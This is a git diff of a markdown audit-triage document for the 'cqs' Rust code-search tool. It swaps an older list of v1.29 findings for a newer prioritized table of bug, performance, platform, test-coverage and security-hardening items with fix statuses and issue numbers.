-| AC-V1.29-2 | `is_structural_query` misses keywords at end-of-query — `"find all trait"` misroutes to Conceptual (α=0.70 instead of 0.90) | easy | `src/search/router.rs:787-789` | pending |
-| AC-V1.29-3 | `bfs_expand` seeds in HashMap order — non-deterministic `name_scores` when cap hits mid-expansion | easy | `src/gather.rs:317-320` | pending |
-| AC-V1.29-5 | `--name-boost` accepts values outside [0,1] — negative embedding weight silently breaks search | easy | `src/cli/args.rs:57-58` | pending |
-| AC-V1.29-6 | `reranker::compute_scores_opt` unchecked `batch_size * stride` mul; negative dim wraps to `usize::MAX` | easy | `src/reranker.rs:368-387` | ✅ fixed |
+| # | Title | Category | Location | Status |
+|---|-------|----------|----------|--------|
+| P3.1 | panic_message helper duplicated 4 ways across 3 modules | Code Quality | `src/cli/pipeline/mod.rs:223`, `src/store/mod.rs:1322`, etc. | ✅ fixed |
+| P3.2 | resolve.rs find_reference + resolve_reference_db duplicate "find by name" twice | Code Quality | `src/cli/commands/resolve.rs:26-57` | ✅ fixed |
+| P3.3 | slot::libc_exdev hardcodes 18 with stale comment — libc is workspace dep | Code Quality | `src/slot/mod.rs:640-647` | ✅ fixed |
+| P3.4 | DOC: enumerate_files doc claims gitignore only — also honors .cqsignore | Documentation | `src/lib.rs:542-547` | ✅ fixed |
+| P3.5 | pub use nl::* leaks dead generate_nl_with_call_context wrapper | API Design | `src/lib.rs:165` + `src/nl/mod.rs:43-59` | ✅ fixed |
+| P3.6 | cqs gather --expand vs --expand-parent flag-name collision | API Design | `src/cli/args.rs:GatherArgs::expand` | ✅ fixed |
+| P3.7 | cqs eval --save accepts path with no .json validation | API Design | `src/cli/commands/eval/mod.rs:EvalCmdArgs::save` | ✅ fixed |
+| P3.8 | OB: cqs eval runner uses eprintln! for progress instead of tracing | Observability | `src/cli/commands/eval/runner.rs:163-168` | ✅ fixed |
+| P3.9 | OB: nl/mod.rs public NL generators have zero spans | Observability | `src/nl/mod.rs:43,65,189,209` | ✅ fixed |
+| P3.10 | OB: embed_documents/embed_query lack completion fields (result.len, dim, time) | Observability | `src/embedder/mod.rs:683,722` | ✅ fixed |
+| P3.11 | OB: Reranker::rerank_with_passages swallows length mismatch silently | Observability | `src/reranker.rs:200-220` | ✅ fixed |
+| P3.12 | OB: train_data git wrappers don't log non-zero exit codes | Observability | `src/train_data/git.rs:65-242` | ✅ fixed |
+| P3.13 | OB: format-string-interpolated tracing::info! at 9 sites — fields lost | Observability | `src/hnsw/build.rs:78,236` + 7 sites | ✅ fixed |
+| P3.14 | OB: cluster_2d emits no warn when corpus has chunks but zero UMAP rows | Observability | `src/serve/data.rs:901, 1020` | ✅ fixed |
+| P3.15 | TC-ADV: validate_slot_name accepts leading-dash / trailing-dash names | Test Coverage (adv) | `src/slot/mod.rs:159-178` | ✅ fixed |
+| P3.16 | TC-ADV: provider.rs ort_runtime_search_dir untested for malformed cmdline | Test Coverage (adv) | `src/embedder/provider.rs:67-123` | ✅ fixed |
+| P3.17 | TC-ADV: blake3_hex_or_passthrough uppercase/short-hex edges untested | Test Coverage (adv) | `src/cache.rs:709-721` | ✅ fixed |
+| P3.18 | RB: SystemTime → i64 cache cast wraps in 2554 | Robustness | `src/cache.rs:349-352, 551-555` | ✅ fixed |
+| P3.19 | RB: libc_exdev hardcodes 18 — wrong on Windows (ERROR_NOT_SAME_DEVICE=17) | Robustness | `src/slot/mod.rs:644-647` | ✅ fixed |
+| P3.20 | RB: cache prune --older-than DAYS computes negative cutoff for huge values | Robustness | `src/cache.rs:548, 551-555` | ✅ fixed |
+| P3.21 | RB: serve/data.rs i64.max(0) as u32 grew to 8 sites (was 3) | Robustness | `src/serve/data.rs` (8 sites) | ✅ fixed |
+| P3.22 | RB: Daemon socket-thread join detaches on timeout but logs "joined cleanly" | Robustness | `src/cli/watch.rs:2374-2400` | ✅ fixed |
+| P3.23 | SHL: diff EMBEDDING_BATCH_SIZE=1000 doesn't scale with model dim | Scaling | `src/diff.rs:158` | ✅ fixed |
+| P3.24 | SHL: Daemon worker_threads=min(num_cpus,4) hardcoded — caps large machines | Scaling | `src/cli/watch.rs:115-119` | ✅ fixed |
+| P3.25 | SHL: train_data MAX_SHOW_SIZE=50MB hardcoded — silent skip on big files | Scaling | `src/train_data/git.rs:167` | ✅ fixed |
+| P3.26 | EX: BatchCmd::is_pipeable is a separate match outside command registry | Extensibility | `src/cli/batch/commands.rs:325-538` | 📋 issue #1137 |
+| P3.27 | EX: LlmProvider resolver hand-codes 2 providers — no registry | Extensibility | `src/llm/mod.rs:200-398` | 📋 issue #1138 |
+| P3.28 | EX: Tree-sitter query files no startup self-test (registry consistency) | Extensibility | `src/language/queries/*.scm` | ✅ fixed |
+| P3.29 | EX: find_project_root markers list hardcoded — could be data | Extensibility | `src/cli/config.rs:155-162` | ✅ fixed |
+| P3.30 | EX: structural_matchers per-language fn — no shared library | Extensibility | `src/language/mod.rs:191,345` | 📋 issue #1139 |
+| P3.31 | EX: Embedder constructor no per-preset extras hook | Extensibility | `src/embedder/models.rs:163-300` | 📋 issue #1140 |
+| P3.32 | PB: EmbeddingCache/QueryCache hardcode ~/.cache/cqs on Windows | Platform | `src/cache.rs:80-84, 1399-1403` | ✅ fixed |
+| P3.33 | PB: dispatch_drift/diff JSON file fields use display() in suggest.rs/types.rs | Platform | `src/suggest.rs:101`, `src/store/types.rs:220` | ✅ fixed |
+| P3.34 | PB: find_ld_library_dir splits on `:` — no Windows arm | Platform | `src/embedder/provider.rs:115-123` | ✅ fixed |
+| P3.35 | PB: index.lock advisory on Linux but mandatory on Windows; doc gap | Platform | `src/cli/files.rs:120-213` | ✅ fixed |
+| P3.36 | PB: is_wsl_drvfs_path misses //wsl.localhost and uppercase mounts | Platform | `src/config.rs:92-101` | ✅ fixed |
+| P3.37 | PB: blame git_file = replace('\\', "/") — Windows verbatim prefix slips through | Platform | `src/cli/commands/io/blame.rs:113-115` | ✅ fixed |
+| P3.38 | PB: daemon_socket_path falls back to temp_dir silently — log differing trust | Platform | `src/daemon_translate.rs:179-188` | ✅ fixed |
+| P3.39 | DS: write_slot_model/write_active_slot skip parent-dir fsync after rename | Data Safety | `src/slot/mod.rs:237-406` | ✅ fixed |
+| P3.40 | DS: update_umap_coords_batch uses TEMP TABLE shared across calls | Data Safety | `src/store/chunks/crud.rs:392-450` | ✅ fixed |
+| P3.41 | PF: reindex_files allocates N empty Embedding placeholders | Performance | `src/cli/watch.rs:2918-2924` | ✅ fixed |
+| P3.42 | PF: prepare_for_embedding always issues store-cache query even on full global hit | Performance | `src/cli/pipeline/embedding.rs:64-82` | ✅ fixed |
+| P3.43 | PF: Daemon socket walks args array twice (validation + extraction) | Performance | `src/cli/watch.rs:266-297` | ✅ fixed |
+| P3.44 | PF: build_graph edge-dedup HashSet keys clone (file,caller,callee) per row | Performance | `src/serve/data.rs:367-373` | ✅ fixed |
+| P3.45 | PF: extract_imports HashSet<String> allocates per candidate even on duplicate | Performance | `src/where_to_add.rs:258-276` | ✅ fixed |
+| P3.46 | PF: Watch reindex cached embedding clone via .get instead of .remove | Performance | `src/cli/watch.rs:2879-2887` | ✅ fixed |
+| P3.47 | RM: LocalProvider worker threads use default 2MB stack — 128MB at concurrency=64 | Resource Mgmt | `src/llm/local.rs:163-256` | ✅ fixed (partial: ceiling reduced 64→16; per-worker stack_size deferred — requires lifting workers out of `thread::scope` since `Scope::spawn` lacks a stack-size hook) |
+| P3.48 | RM: LocalProvider::http no pool_max_idle / idle_timeout | Resource Mgmt | `src/llm/local.rs:97-100` | ✅ fixed |
+| P3.49 | TC-HAP: cmd_similar (CLI) has no integration test | Test Coverage | `src/cli/commands/search/similar.rs:41` | ✅ fixed (already covered by `tests/cli_similar_test.rs` — TC-HAP-1.29-7 envelope shape + self-exclusion + unknown-name error) |
+| P3.50 | TC-HAP: cmd_ci happy path untested; only error paths tested | Test Coverage | `src/cli/commands/review/ci.rs:9` | ✅ fixed (already covered by `tests/cli_train_review_test.rs::test_ci_happy_path_non_empty_diff_emits_full_report`) |
+| P3.51 | TC-HAP: cmd_gather (CLI) untested; only library gather() tested | Test Coverage | `src/cli/commands/search/gather.rs:77` | ✅ fixed (already covered by `tests/cli_gather_test.rs` — TC-HAP-1.29-9 envelope + token-budget) |
+| P3.52 | TC-HAP: dispatch_line no happy-path test for valid command | Test Coverage | `src/cli/batch/mod.rs:557` | ✅ fixed (added `test_dispatch_line_stats_emits_success_envelope_shape`) |
+| P3.53 | TC-HAP: select_provider/detect_provider untested (#1120 split) | Test Coverage | `src/embedder/provider.rs:171-258` | ✅ fixed (added `tests` mod with `select_provider_caches_first_call`, `detect_provider_returns_valid_variant`, `execution_provider_is_debug_and_copy`) |
 
-### API Design
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| API-V1.29-1 | `cqs --json project list/remove` silently emit text | easy | `src/cli/commands/infra/project.rs:90-108, 110-118` | ✅ fixed |
-| API-V1.29-2 | `cqs --json ref add/remove/update` silently emit text | easy | `src/cli/commands/infra/reference.rs:42-69` | ✅ fixed |
-| API-V1.29-4 | `cqs notes list --check` dropped by daemon batch dispatch (NotesListArgs missing field) | easy | `src/cli/args.rs:527-540`, `batch/handlers/misc.rs:85-118` | pending |
+## P4 — Defer / Issues
 
-### Error Handling
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| EH-V1.29-1 | `cli/commands/io/brief.rs::build_brief_data` swallows 3 consecutive store errors, zero-filled output | medium | `src/cli/commands/io/brief.rs:59-75` | pending |
-| EH-V1.29-2 | `ci::run_ci_analysis` silently downgrades dead-code scan failure into "0 dead" with no gate signal | easy | `src/ci.rs:100-128` | pending |
-| EH-V1.29-7 | `cache::EmbeddingCache::stats` swallows 5 per-query failures into a single lying `CacheStats` | easy | `src/cache.rs:408-461` | pending |
-| EH-V1.29-8 | Daemon gitignore RwLock poison silently treated as "no matcher" — re-indexes ignored files | easy | `src/cli/watch.rs:1737,1945` | pending |
+| # | Title | Category | Location | Disposition | Status |
+|---|-------|----------|----------|-------------|--------|
+| P4.1 | AuthToken::from_string cfg-gated, alphabet invariant relies on docstring | Security | `src/serve/auth.rs:75-78, 218` | issue (hardening) | 📋 issue #1134 |
+| P4.2 | Path=/ cookie scope on 127.0.0.1 — multiple cqs serve on same host stomp | Security | `src/serve/auth.rs:211-214` | issue (browser cookie limit) | 📋 issue #1135 |
+| P4.3 | Auth state ignored by quiet=true — Option<AuthToken> permits silent no-auth | Security | `src/serve/mod.rs:78-83` | issue (type-state refactor) | 📋 issue #1136 |
 
-### Code Quality
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| CQ-V1.29-3 | `cmd_similar` local `resolve_target` diverges from `cqs::resolve_target` — CLI picks test chunks, batch picks real ones | easy | `src/cli/commands/search/similar.rs:16-39` | pending |
-| CQ-V1.29-6 | `cqs doctor` reports compile-time `MODEL_NAME` constant as index metadata — silently wrong after `cqs model swap` | easy | `src/cli/commands/infra/doctor.rs:144-147,155-156` | pending |
+## Summary
 
-### Documentation
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| DOC-V1.29-1 | CONTRIBUTING.md says "Schema v20" — actual is v22 | easy | `CONTRIBUTING.md:193,207` | pending |
-| DOC-V1.29-2 | README doesn't document `cqs serve` (flagship v1.29.0 feature) | medium | `README.md` | pending |
-| DOC-V1.29-3 | README/CONTRIBUTING missing `.cqsignore` | easy | `README.md`, `CONTRIBUTING.md` | pending |
-| DOC-V1.29-4 | SECURITY.md says integrity check is opt-out — actual is opt-in (backwards) | easy | `SECURITY.md:22` | pending |
+- **P1: 21 findings** — biggest themes:
+  - Docs lying about security/privacy (query_log opt-in, query_cache TTL, registry/dispatch contributor docs, project registry path)
+  - Auth token leakage (TraceLayer span URI, journald banner, missing-Host bypass)
+  - Critical defaults misleading users (gather "200" warning, reranker config ignored, embedder fingerprint cache thrash)
+  - Single-line wiring bugs (LocalProvider mutex poison loses results, name_boost sign-flip, token_pack break-vs-continue, drain_pending_rebuild dedup)
+  - Observability "off" by default — 150 spans invisible until OB-V1.30-1 lands
+- **P2: 92 findings** — biggest themes:
+  - Determinism / tie-break gaps in 8+ sort sites (semantic_diff, bfs_expand, contrastive_neighbors, doc_comments, map_hunks, related, etc.)
+  - Cross-slot data-safety issues stemming from #1105 (slot TOCTOU, fingerprint fallback, evict/write race, schema purpose conflation)
+  - Untested v1.30.0 surfaces (#1113 HNSW rebuild, #1114 registry, #1118 auth, #1120 provider split, serve data endpoints, batch dispatch handlers, LLM passes)
+  - Config/JSON contract drift (--json absent on init/index/convert/refresh; list shapes inconsistent; cache stats unit mix)
+  - Resource-management leaks introduced in v1.30.0 (detached rebuild thread, pending.delta unbounded, LocalProvider stash, eager QueryCache open, eager CUDA probe)
+- **P3: 53 findings** — biggest themes:
+  - Observability convention drift (eprintln, format-string interpolation, missing completion fields, missing spans on hot fns)
+  - Platform/Windows refinements (cache paths, path normalization, EXDEV constant, WSL UNC paths, mtime FAT32)
+  - Performance micro-opts (allocator churn, unnecessary clone, double-pass scans, correlated subquery on small budget)
+  - Adversarial test additions for newly-shipped surfaces
+- **P4: 3 findings** — biggest themes:
+  - Auth/security hardening that requires type-state refactors or cookie scope changes browser-wide
+  - All three are tracking-issue material; no inline triv
 
-### Scaling
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| SHL-V1.29-2 | `MAX_BATCH_LINE_LEN = 1 MB` blocks large diffs via batch/daemon; CLI accepts 50 MB | easy | `src/cli/batch/mod.rs:104` | pending |
+## Cross-cutting Observations
 
-### Performance
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| PF-V1.29-1 | Daemon shell-joins and re-splits args on every query (waste on hot path) | medium | `src/cli/watch.rs:315-331` | pending |
-
-### Resource Management
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| RM-V1.29-1 | `load_references` rebuilds rayon pool + reloads every ref Store+HNSW per `--include-refs` query (bypasses LRU) | medium | `src/cli/batch/handlers/search.rs:286`, `src/reference.rs:204-217` | pending |
-
-### Extensibility
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| EX-V1.29-5 | `NotesListArgs` and `NotesCommand::List` are two hand-maintained arg structs — drift already visible | easy | `src/cli/args.rs:527-540`, `commands/io/notes.rs:49-65` | pending |
-
-### Test Coverage
-| ID | Title | Difficulty | Location | Status |
-|---|---|---|---|---|
-| TC-HAP-1.29-1 | `cqs serve` endpoints (`build_graph` / `build_chunk_detail` / `build_hierarchy` / `build_cluster`) never tested with data | medium | `src/serve/data.rs:192, 452, 586, 825` | ✅ fixed |
-| TC-HAP-1.29-2 | 16 batch dispatch handlers (gather/scout/task/where/onboard/callers/…) have zero tests | medium | `src/cli/batch/handlers/*.rs` | ✅ fixed |
-| TC-ADV-1.29-3 | Daemon socket `handle_socket_client` — zero adversarial tests (1 MiB boundary, malformed JSON, NUL-in-args, oversized args) | medium | `src/cli/watch.rs:160-406` | ✅ fixed |
-
-## P3 — Easy + Low Impact (fix if time)
-
-### Security (low-impact)
-- **SEC-5**: `GraphQuery.file` LIKE filter — `%`/`_` metacharacter injection breaks prefix contract (`src/serve/data.rs:241-248`)
-- **SEC-8**: LIKE injection in `build_chunk_detail` "tests that cover" heuristic — hostile function name matches many tests (`src/serve/data.rs:533-541`)
-
-### Platform (low-impact)
-- **PB-V1.29-4**: `init` writes `.gitignore` LF-only, noisy `git status` on Windows autocrlf (`src/cli/commands/infra/init.rs:36-40`)
-- **PB-V1.29-6**: Hardcoded `/mnt/` WSL check ignores custom `wsl.conf automount.root` (`src/hnsw/persist.rs:86-87`, `src/project.rs:85-86`, `src/config.rs:445-451`)
-- **PB-V1.29-7**: `EmbeddingCache::open` / `QueryCache::open` propagate `set_permissions` failure on WSL DrvFS (`src/cache.rs:73-80, 1002-1009`)
-- **PB-V1.29-9**: `aux_model::expand_tilde` only handles `~/` prefix — misses bare `~` and `~\` (`src/aux_model.rs:101-108`)
-
-### Data Safety (low-impact)
-- **DS2-5**: `EmbeddingCache::evict` / `QueryCache::evict` TOCTOU on SELECT size/AVG/DELETE (`src/cache.rs:352-400, 1103-1147`)
-- **DS2-6**: HNSW save's `.bak` rename doesn't fsync parent dir before `atomic_replace` pass (`src/hnsw/persist.rs:414-426`)
-- **DS2-7**: HNSW dirty-flag drift — `set_hnsw_dirty(false)` failure after save leaves `dirty=1` permanently (`src/cli/watch.rs:2326-2338, 2250-2257`)
-- **DS2-9**: `upsert_sparse_vectors` rollback missing generation bump — stale on-disk `splade.index.bin` trusted (`src/store/sparse.rs:113-117, 193-196`)
-- **DS2-10**: `as_millis() as i64` mtime cast — pathological mtime → negative value stored in `notes.file_mtime` (`src/cli/watch.rs:2556`, `src/lib.rs:454`, 13 sites total)
-
-### Algorithm Correctness (low-impact)
-- **AC-V1.29-4**: `llm::summary::contrastive_neighbors` top-K no tie-break (`src/llm/summary.rs:263,265,267`)
-- **AC-V1.29-7**: `llm::doc_comments::select_uncached` sort tie-break (`src/llm/doc_comments.rs:222-229`)
-
-### Code Quality (low-impact)
-- **CQ-V1.29-1**: `BatchProvider::submit_batch` (4-arg) + 3 impls dead — delete (`src/llm/provider.rs:27-33`)
-- **CQ-V1.29-2**: `build_scout_output` documented "shared" but `dispatch_scout` duplicates it inline (`src/cli/commands/search/scout.rs:26-38`)
-- **CQ-V1.29-4**: Risk thresholds duplicated in `cmd_affected` — JSON vs text path (`src/cli/commands/review/affected.rs:92-100, 143-149`)
-- **CQ-V1.29-5**: "Empty impact diff" JSON object duplicated across 3 files, 4 sites (`src/cli/batch/handlers/graph.rs:402-407, 412-417`, etc.)
-
-### Documentation (low-impact)
-- **DOC-V1.29-5**: ROADMAP.md lists shipped `cqs serve` under "Parked" (line 174)
-- **DOC-V1.29-6**: CONTRIBUTING.md Architecture Overview missing 6 files (`aux_model.rs`, `daemon_translate.rs`, `eval/`, `fs.rs`, `limits.rs`, `serve/`)
-- **DOC-V1.29-7**: `src/hnsw/build.rs:39` docstring points at nonexistent `cli/commands/index.rs`
-- **DOC-V1.29-8**: `.claude/skills/troubleshoot/SKILL.md` references nonexistent `hnsw.bin`, wrong default model
-- **DOC-V1.29-9**: `TODO(docs-agent): document this rule in CONTRIBUTING.md` unresolved after landing
-- **DOC-V1.29-10**: README Performance section pinned to v1.27.0 eval file, stale chunk count
-
-### API Design (low-impact)
-- **API-V1.29-3**: `cqs telemetry --reset --json` silently drops `--json` (`src/cli/commands/infra/telemetry_cmd.rs:520-578`)
-- **API-V1.29-5**: `dispatch_drift` / `dispatch_diff` emit `file` via `.display()` not `normalize_path` (subsumed by PB-V1.29-5)
-- **API-V1.29-6**: `BatchCmd::Refresh` / `invalidate` has no CLI surface
-- **API-V1.29-7**: `cqs eval --limit` missing `-n` short flag (sibling of every other query command)
-- **API-V1.29-8**: Pretty/compact JSON drift between CLI and daemon paths
-- **API-V1.29-9**: `--expand` on `cqs search` vs `--expand-parent` on top-level — rename to match
-- **API-V1.29-10**: `--depth` short flag `-d` present on `cqs onboard`, absent on `impact`/`test-map`
-
-### Error Handling (low-impact)
-- **EH-V1.29-3**: `dispatch::try_daemon_query` silently falls back to CLI when re-serialization fails (`src/cli/dispatch.rs:785-790`)
-- **EH-V1.29-4**: `cli/commands/io/blame.rs::build_blame_data` silently suppresses callers fetch failure (`:52-59`)
-- **EH-V1.29-5**: `suggest::generate_suggestions` silently skips dedup against existing notes on store error (`src/suggest.rs:62-65`)
-- **EH-V1.29-6**: `where_to_add::suggest_placement_with_options_core` silently drops pattern data on batch fetch failure (`src/where_to_add.rs:208-214`)
-- **EH-V1.29-10**: `cagra::delete_persisted` discards both `remove_file` errors silently (`src/cagra.rs:1097-1102`)
-
-### Observability (low-impact)
-- **OB-V1.29-1**: `Reranker::rerank` lacks entry span; `rerank_with_passages` has one (`src/reranker.rs:160`)
-- **OB-V1.29-2**: `serve::build_chunk_detail` and `build_stats` lack spans; other three `build_*` have them (`src/serve/data.rs:452, 933`)
-- **OB-V1.29-3**: `cmd_project` span doesn't record subcommand (`src/cli/commands/infra/project.rs:75`)
-- **OB-V1.29-4**: `verify_hnsw_checksums` uses format-interpolated `tracing::warn!` (`src/hnsw/persist.rs:136`)
-- **OB-V1.29-5**: `serve` axum handlers log entry but never completion — no latency trace (medium effort)
-- **OB-V1.29-6**: `classify_query` / `reclassify_with_centroid` lack entry span (`src/search/router.rs:561, 1093`)
-- **OB-V1.29-7**: `verify_hnsw_checksums` flattens `io::ErrorKind` via `String` — operator loses ErrorKind
-
-### Robustness (low-impact)
-- **RB-V1.29-1**: `timeout_minutes * 60` env-var multiplication can overflow (`src/cli/batch/mod.rs:343, 378`)
-- **RB-V1.29-2**: UMAP row/dim/id_max_len narrowing cast without ceiling check (`src/cli/commands/index/umap.rs:104-106,116`)
-- **RB-V1.29-3**: `serve/data.rs` negative `line_start` from DB silently clamped to 0 then cast to `u32` (`:504, :787, :785-788`)
-- **RB-V1.29-6**: `chunk_count as usize` on 32-bit silently truncates — add crate-level 64-bit gate
-- **RB-V1.29-9**: SPLADE 6 sites cast `shape[N] as usize` on ORT `i64` dim without negative check (`src/splade/mod.rs:145,154,524,549,770-838`)
-- **RB-V1.29-10**: `id_map.len() * dim * 4 * 2` unchecked mul in HNSW persist (`src/hnsw/persist.rs:647`)
-
-### Scaling (low-impact)
-- **SHL-V1.29-1**: `pad_2d_i64` hardcodes pad-token-id = 0 — breaks non-BERT tokenizers (RoBERTa pad=1) (medium effort)
-- **SHL-V1.29-3**: `MAX_ID_MAP_SIZE = 100 MB` in `count_vectors` silently drops stats for 1.7M+ chunk corpora
-- **SHL-V1.29-4**: Onboard `MAX_CALLEE_FETCH=30` / `MAX_CALLER_FETCH=15` no env override
-- **SHL-V1.29-5**: `task.rs` gather constants (`DEPTH=2`, `MAX_NODES=100`, `MULTIPLIER=3`) no env override
-- **SHL-V1.29-6**: `SCOUT_LIMIT_MAX` / `SIMILAR_LIMIT_MAX` / `RELATED_LIMIT_MAX` hardcoded while siblings have env overrides
-- **SHL-V1.29-9**: `DAEMON_PERIODIC_GC_INTERVAL_SECS` / `_IDLE_SECS` hardcoded while CAP has env override
-- **SHL-V1.29-10**: `convert/{html,mod}::MAX_FILE_SIZE = 100 MB` duplicated, no env override
-
-### Performance (low-impact)
-- **PF-V1.29-2**: `fetch_chunks_by_ids_async` / `fetch_candidates_by_ids_async` hardcode `BATCH_SIZE=500` based on obsolete 999-parameter limit (`src/store/chunks/async_helpers.rs:27,69`)
-- **PF-V1.29-3**: `get_type_users_batch` / `get_types_used_by_batch` hardcode 200 — 3× round trips on impact (`src/store/types.rs:392,438`)
-- **PF-V1.29-4**: `find_hotspots` allocates String for every callee before truncating (`src/impact/hints.rs:261-271`)
-- **PF-V1.29-5**: Parser unconditionally allocates CRLF-replaced copy of every source file (`src/parser/mod.rs:491`)
-- **PF-V1.29-6**: `BatchContext::notes()` clones full Vec per call; siblings use `Arc<...>` (medium effort)
-- **PF-V1.29-7**: `upsert_notes_batch` fires 3 SQL statements per note (medium effort)
-- **PF-V1.29-8**: `prune_missing` fires `dunce::canonicalize` syscall per missing-path candidate (medium effort)
-- **PF-V1.29-10**: `finalize_results` unnecessarily clones sanitized FTS string (`src/search/query.rs:363-369`)
-
-### Resource Management (low-impact)
-- **RM-V1.29-2**: `evict_global_embedding_cache_with_runtime` opens `QueryCache` with fresh single-thread runtime every eviction tick (`src/cli/batch/mod.rs:1225`)
-- **RM-V1.29-3**: `search_across_projects` builds fresh rayon pool per call (medium effort)
-- **RM-V1.29-4**: `TelemetryAggregator::query_counts` unbounded — no cardinality cap (medium effort)
-- **RM-V1.29-5**: CHM/WebHelp page readers no per-page byte cap (`src/convert/chm.rs:107`, `webhelp.rs:120`)
-- **RM-V1.29-6**: `cqs serve` multi-thread runtime no `worker_threads` cap — uses `num_cpus` (`src/serve/mod.rs:63-66`)
-- **RM-V1.29-7**: `EmbeddingCache` / `QueryCache` no `Drop` impl → no WAL checkpoint on daemon shutdown (P2 #70 claim was wrong) (medium effort)
-- **RM-V1.29-8**: `Box::leak` pattern in watch.rs test helpers (`src/cli/watch.rs:2660-2663, 2686-2689`)
-
-### Extensibility (low-impact)
-- **EX-V1.29-6**: `cli/commands/infra/init.rs` hardcodes model sizes to `dim >= 1024` heuristic (`:42-50`)
-- **EX-V1.29-9**: `aux_model::config_from_dir` hardcodes on-disk layout per kind (`:136-148`)
-
-### Test Coverage (adversarial, mostly P3)
-- **TC-ADV-1.29-1**: `normalize_l2` silently returns NaN/Inf — no test (`src/embedder/mod.rs:1023-1030`)
-- **TC-ADV-1.29-2**: `embed_batch` doesn't validate ORT output for NaN/Inf before `Embedding::new` (medium)
-- **TC-ADV-1.29-4**: `parse_unified_diff` missing edge-case tests (double `+++`, orphan `@@`, whitespace-only)
-- **TC-ADV-1.29-5**: `parse_notes_str` missing tests for huge mentions array, empty text, NUL-in-text
-- **TC-ADV-1.29-6**: HNSW `load_with_dim` missing id_map duplicate/empty/NUL tests
-- **TC-ADV-1.29-7**: `embedding_slice` silently passes NaN/Inf bytes from DB
-- **TC-ADV-1.29-8**: `dispatch_line` shell_words untested on ANSI/BEL/CR
-- **TC-ADV-1.29-9**: `SpladeEncoder::encode` raw-logits propagates Inf
-- **TC-ADV-1.29-10**: No DoS test for `parse_unified_diff` on 50MB diff (medium)
-
-### Test Coverage (happy path, low-impact)
-- **TC-HAP-1.29-3**: `Reranker::rerank`/`rerank_with_passages` no tests (medium)
-- **TC-HAP-1.29-4**: `cmd_project { Search }` no integration test (medium)
-- **TC-HAP-1.29-5**: `cmd_ref_add/list/remove/update` no end-to-end tests (medium)
-- **TC-HAP-1.29-6**: `handle_socket_client` no happy-path round-trip test (medium)
-- **TC-HAP-1.29-7**: `cmd_similar` no integration test
-- **TC-HAP-1.29-8**: `cmd_ci` happy path untested — library tested, CLI only error paths
-- **TC-HAP-1.29-9**: `cmd_gather` (CLI) untested
-- **TC-HAP-1.29-10**: `dispatch_line` no happy-path test (only error/adversarial)
-
-## P4 — Hard OR Low Impact (file issues or defer)
-
-### Security (architectural)
-- **SEC-6**: `cmd_serve` spawns `xdg-open`/`open`/`explorer.exe` on URL with bind string — command-string injection surface (hard, speculative) → file issue
-- **SEC-7**: `cqs serve` has no authentication — default stance relies on "localhost is trusted" (hard, architectural) → file issue
-
-### Platform (low-impact + speculative)
-- **PB-V1.29-8**: `HF_HOME` / `HUGGINGFACE_HUB_CACHE` lookup doesn't honor Windows `%LOCALAPPDATA%` default (medium, Windows-only)
-- **PB-V1.29-10**: WSL detection via `/proc/version` — false positives on non-WSL Linux with "microsoft" in kernel (medium, speculative)
-
-### Extensibility (architectural)
-- **EX-V1.29-1**: Adding a new CLI command requires coordinated edits across 5-7 files (hard) → file as tracking issue
-- **EX-V1.29-2**: `where_to_add::extract_patterns` hardcodes Rust/TS-JS/Go custom logic — refactor to `LanguageDef::patterns` (medium)
-- **EX-V1.29-3**: `LlmProvider` enum: adding new provider requires 5+ site edits (medium)
-- **EX-V1.29-4**: `AuxModelKind` preset registration duplicates matrix (medium)
-- **EX-V1.29-7**: Tree-sitter query file naming has no startup self-test (medium)
-- **EX-V1.29-8**: Config schema: adding `[foo]` section requires edits in 3-4 files with no shared pattern (medium)
-
-### Robustness (hard + low risk)
-- **RB-V1.29-5**: `extract_l5k_regions` regex captures `.unwrap()` on group 0/1/2 (hard, regex-crate-bug only)
-- **RB-V1.29-8**: `reranker.rs` ORT `shape[1] as usize` on negative dim (low — already covered by AC-V1.29-6)
-
-### Scaling (low-impact)
-- **SHL-V1.29-7**: Hotspot thresholds (`HOTSPOT_MIN_CALLERS=5` etc.) don't scale with corpus size (medium, speculative)
-- **SHL-V1.29-8**: Risk score thresholds (`HIGH=5.0, MEDIUM=2.0`) hardcoded (medium, speculative)
-
-### Error Handling (pattern)
-- **EH-V1.29-9**: Project-wide `warnings: Vec<String>` field pattern for `.unwrap_or_default()` paths (medium, cross-cutting pattern)
-
-### Performance (hard)
-- **PF-V1.29-9**: `suggest_tests` runs `reverse_bfs` inside a loop over callers — O(callers × graph) (hard)
-
-### Resource Management (low-impact)
-- **RM-V1.29-9**: Daemon socket thread spawn without pre-bounded stack size (medium)
-- **RM-V1.29-10**: `handle_socket_client` BufReader allocates per-connection (easy but low-priority)
-
-## Cross-references to known open issues
-
-Security findings overlap with the threat model in SECURITY.md for `cqs serve`. The platform findings (PB-V1.29-*) are a natural follow-up to v1.27.0 wave-1 triage which found similar `normalize_path` gaps. DS2-1/DS2-2 extend the P2 #32 fix that closed the equivalent class for `prune_all`.
-
-## Stop condition
-
-Triage covers all 147 findings. Next: generate fix prompts for P1 + P2 (bounded, high-signal set). P3 collected for inline sweep after P1/P2 land. P4 items filed as issues or deferred.
+- **Docs lying is concentrated in the v1.30.0 release surface.** PRIVACY/SECURITY/CHANGELOG/CONTRIBUTING/README each have ≥1 P1 lie (query_log opt-in, query_cache TTL, CQS_LLM_ENDPOINT, dispatch.rs procedure, project registry path). Each is an easy text fix; together they indicate the v1.30.0 release notes pass (#1122) didn't cross-check against actual code paths.
+- **Mutex/error-handling silent-failure pattern recurs across LocalProvider (#1101).** RB-V1.30-1 (unbounded body), RB-V1.30-7 (auth_attempts mutex unwrap), TC-ADV-1.30-1 (body DoS), EH (Mutex::into_inner unwrap_or_default loses batch results), and the silent fetch_batch_results empty-on-missing all stem from the same "build this fast for #1101 ship date" pattern. A focused PR to harden LocalProvider would close 5+ findings.
